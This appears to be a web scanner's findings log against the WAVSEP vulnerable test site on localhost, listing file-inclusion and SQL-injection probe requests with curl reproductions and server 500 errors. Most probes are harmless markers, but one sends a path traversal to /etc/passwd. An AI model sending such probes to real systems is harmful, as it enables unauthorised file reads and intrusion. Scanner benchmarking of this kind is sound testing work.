curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp?msg=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case04-InjectionInUpdate-String-CommandInjection-WithErrors.jsp?msg=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case05-InjectionInSearchOrderBy-String-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case06-InjectionInView-Numeric-PermissionBypass-WithErrors.jsp?transactionId=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case07-InjectionInSearch-Numeric-UnionExploit-WithErrors.jsp?msgId=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp?msgid=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp?orderby=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp?transactionId=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp?msgId=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp?msgid=http%3A%2F%2Fwww.google.fr%2F%3F"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case01-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnIvFailure.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case02-FalsePositiveInjectionInLogin-PsAndIv-500SyntaxErrorOnIvFailure.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case06-FalsePositiveInjectionInLogin-HoneyPotNoSQL-Fake500SyntaxErrorOnIvFailure.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-FalsePositives-GET/Case07-FalsePositiveInjectionInLogin-PsAndIv-500ErrorOnUnrelatedSyntaxError.jsp?username=http%3A%2F%2Fwww.google.fr%2F%3F&password=textvalue2"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=%C2%BF%27%22%28"
